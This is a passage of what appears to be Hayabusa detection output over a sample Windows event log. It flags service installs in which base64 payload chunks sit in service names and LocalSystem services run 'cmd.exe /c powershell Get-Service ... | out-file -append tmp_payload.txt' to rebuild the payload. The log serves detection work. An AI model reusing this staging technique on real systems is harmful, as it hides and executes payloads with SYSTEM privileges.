Tchopper.evtx" +2021-11-03 08:20:01.550 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: FkZCgkRHJvcERvd24pDQoNCiAgICAgICAgJERyb3BEb3duTGFiZWwgPSBuZXctb2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLkxhYmVsDQogICAgICAgICREcm9wRG93bkxhYmVsLkxvY2F0aW9u | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg198"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:01.550 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: FkZCgkRHJvcERvd24pDQoNCiAgICAgICAgJERyb3BEb3duTGFiZWwgPSBuZXctb2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLkxhYmVsDQogICAgICAgICREcm9wRG93bkxhYmVsLkxvY2F0aW9u | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg198"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:01.550 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: FkZCgkRHJvcERvd24pDQoNCiAgICAgICAgJERyb3BEb3duTGFiZWwgPSBuZXctb2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLkxhYmVsDQogICAgICAgICREcm9wRG93bkxhYmVsLkxvY2F0aW9u | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg198"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:20:03.020 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ID0gbmV3LW9iamVjdCBTeXN0ZW0uRHJhd2luZy5TaXplKDEwLDEwKSANCiAgICAgICAgJERyb3BEb3duTGFiZWwuc2l6ZSA9IG5ldy1vYmplY3QgU3lzdGVtLkRyYXdpbmcuU2l6ZSgxMDAsMjApIA | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg199"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:03.020 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ID0gbmV3LW9iamVjdCBTeXN0ZW0uRHJhd2luZy5TaXplKDEwLDEwKSANCiAgICAgICAgJERyb3BEb3duTGFiZWwuc2l6ZSA9IG5ldy1vYmplY3QgU3lzdGVtLkRyYXdpbmcuU2l6ZSgxMDAsMjApIA | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg199"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:03.020 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ID0gbmV3LW9iamVjdCBTeXN0ZW0uRHJhd2luZy5TaXplKDEwLDEwKSANCiAgICAgICAgJERyb3BEb3duTGFiZWwuc2l6ZSA9IG5ldy1vYmplY3QgU3lzdGVtLkRyYXdpbmcuU2l6ZSgxMDAsMjApIA | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg199"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:20:04.472 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 0KICAgICAgICAkRHJvcERvd25MYWJlbC5UZXh0ID0gIk9wdGlvbnM6Ig0KICAgICAgICAkRm9ybS5Db250cm9scy5BZGQoJERyb3BEb3duTGFiZWwpDQoNCiAgICAgICAgJEJ1dHRvbiA9IG5ldy1v | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg200"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:04.472 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0KICAgICAgICAkRHJvcERvd25MYWJlbC5UZXh0ID0gIk9wdGlvbnM6Ig0KICAgICAgICAkRm9ybS5Db250cm9scy5BZGQoJERyb3BEb3duTGFiZWwpDQoNCiAgICAgICAgJEJ1dHRvbiA9IG5ldy1v | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg200"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:04.472 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0KICAgICAgICAkRHJvcERvd25MYWJlbC5UZXh0ID0gIk9wdGlvbnM6Ig0KICAgICAgICAkRm9ybS5Db250cm9scy5BZGQoJERyb3BEb3duTGFiZWwpDQoNCiAgICAgICAgJEJ1dHRvbiA9IG5ldy1v | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg200"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:20:05.916 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: YmplY3QgU3lzdGVtLldpbmRvd3MuRm9ybXMuQnV0dG9uDQogICAgICAgICRCdXR0b24uTG9jYXRpb24gPSBuZXctb2JqZWN0IFN5c3RlbS5EcmF3aW5nLlNpemUoMTAwLDUwKQ0KICAgICAgICAkQn | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg201"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:05.916 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: YmplY3QgU3lzdGVtLldpbmRvd3MuRm9ybXMuQnV0dG9uDQogICAgICAgICRCdXR0b24uTG9jYXRpb24gPSBuZXctb2JqZWN0IFN5c3RlbS5EcmF3aW5nLlNpemUoMTAwLDUwKQ0KICAgICAgICAkQn | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg201"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:05.916 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: YmplY3QgU3lzdGVtLldpbmRvd3MuRm9ybXMuQnV0dG9uDQogICAgICAgICRCdXR0b24uTG9jYXRpb24gPSBuZXctb2JqZWN0IFN5c3RlbS5EcmF3aW5nLlNpemUoMTAwLDUwKQ0KICAgICAgICAkQn | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg201"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:20:07.360 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: V0dG9uLlNpemUgPSBuZXctb2JqZWN0IFN5c3RlbS5EcmF3aW5nLlNpemUoMTAwLDIwKQ0KICAgICAgICAkQnV0dG9uLlRleHQgPSAiU3VibWl0Ig0KICAgICAgICAkQnV0dG9uLkFkZF9DbGljayh7 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg202"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:07.360 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: V0dG9uLlNpemUgPSBuZXctb2JqZWN0IFN5c3RlbS5EcmF3aW5nLlNpemUoMTAwLDIwKQ0KICAgICAgICAkQnV0dG9uLlRleHQgPSAiU3VibWl0Ig0KICAgICAgICAkQnV0dG9uLkFkZF9DbGljayh7 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg202"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:07.360 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: V0dG9uLlNpemUgPSBuZXctb2JqZWN0IFN5c3RlbS5EcmF3aW5nLlNpemUoMTAwLDIwKQ0KICAgICAgICAkQnV0dG9uLlRleHQgPSAiU3VibWl0Ig0KICAgICAgICAkQnV0dG9uLkFkZF9DbGljayh7 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg202"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:20:08.810 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: UmV0dXJuLURyb3BEb3dufSkNCiAgICAgICAgJGZvcm0uQ29udHJvbHMuQWRkKCRCdXR0b24pDQoNCiAgICAgICAgJERyb3BEb3duLlNlbGVjdGVkSW5kZXggPSAgMA0KICAgICAgICANCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg203"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:08.810 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: UmV0dXJuLURyb3BEb3dufSkNCiAgICAgICAgJGZvcm0uQ29udHJvbHMuQWRkKCRCdXR0b24pDQoNCiAgICAgICAgJERyb3BEb3duLlNlbGVjdGVkSW5kZXggPSAgMA0KICAgICAgICANCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg203"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:08.810 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: UmV0dXJuLURyb3BEb3dufSkNCiAgICAgICAgJGZvcm0uQ29udHJvbHMuQWRkKCRCdXR0b24pDQoNCiAgICAgICAgJERyb3BEb3duLlNlbGVjdGVkSW5kZXggPSAgMA0KICAgICAgICANCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg203"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:20:10.268 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgJEZvcm0uQWRkX1Nob3duKHskRm9ybS5BY3RpdmF0ZSgpfSkNCiAgICAgICAgW3ZvaWRdICRGb3JtLlNob3dEaWFsb2coKQ0KDQogICAgICAgICRDaG9pY2UNCiAgICAgfQ0KICAgICANCiAgICBj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg204"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:10.268 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgJEZvcm0uQWRkX1Nob3duKHskRm9ybS5BY3RpdmF0ZSgpfSkNCiAgICAgICAgW3ZvaWRdICRGb3JtLlNob3dEaWFsb2coKQ0KDQogICAgICAgICRDaG9pY2UNCiAgICAgfQ0KICAgICANCiAgICBj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg204"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:10.268 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgJEZvcm0uQWRkX1Nob3duKHskRm9ybS5BY3RpdmF0ZSgpfSkNCiAgICAgICAgW3ZvaWRdICRGb3JtLlNob3dEaWFsb2coKQ0KDQogICAgICAgICRDaG9pY2UNCiAgICAgfQ0KICAgICANCiAgICBj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg204"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:20:11.713 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: YXRjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBnZW5lcmF0ZSBpbnB1dCBkcm9wIGRvd24iDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgJEVycm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg205"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:11.713 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: YXRjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBnZW5lcmF0ZSBpbnB1dCBkcm9wIGRvd24iDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgJEVycm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg205"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:11.713 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: YXRjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBnZW5lcmF0ZSBpbnB1dCBkcm9wIGRvd24iDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgJEVycm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg205"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:20:13.158 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIkNh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg206"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:13.158 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIkNh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg206"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:13.158 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIkNh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg206"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:20:14.614 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: dWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBleGl0DQoNCiAgICB9DQp9DQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg207"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:14.614 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBleGl0DQoNCiAgICB9DQp9DQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg207"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:14.614 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBleGl0DQoNCiAgICB9DQp9DQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg207"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:20:16.115 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGdldCB0aGUgbGlzdCBvZiBjb21wdXRlcnMgYmFzZWQgb24gdGhlIHVzZXJzIHNl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg208"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:16.115 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGdldCB0aGUgbGlzdCBvZiBjb21wdXRlcnMgYmFzZWQgb24gdGhlIHVzZXJzIHNl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg208"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:16.115 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGdldCB0aGUgbGlzdCBvZiBjb21wdXRlcnMgYmFzZWQgb24gdGhlIHVzZXJzIHNl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg208"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:20:17.556 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: bGVjdGVkIGxpc3QgdHlwZQ0KDQojQHBhcmFtICRDb21wdXRlckxpc3RUeXBlICAgLT4gVGhlIHR5cGUgb2YgY29tcHV0ZXIgbGlzdCAgIA0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg209"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:17.556 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bGVjdGVkIGxpc3QgdHlwZQ0KDQojQHBhcmFtICRDb21wdXRlckxpc3RUeXBlICAgLT4gVGhlIHR5cGUgb2YgY29tcHV0ZXIgbGlzdCAgIA0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg209"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:17.556 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bGVjdGVkIGxpc3QgdHlwZQ0KDQojQHBhcmFtICRDb21wdXRlckxpc3RUeXBlICAgLT4gVGhlIHR5cGUgb2YgY29tcHV0ZXIgbGlzdCAgIA0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg209"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:20:19.033 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBHZXQtQ29tcHV0ZXJMaXN0IHsgcGFyYW0oJENvbXB1dGVyTGlzdFR5 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg210"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:19.033 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBHZXQtQ29tcHV0ZXJMaXN0IHsgcGFyYW0oJENvbXB1dGVyTGlzdFR5 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg210"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start 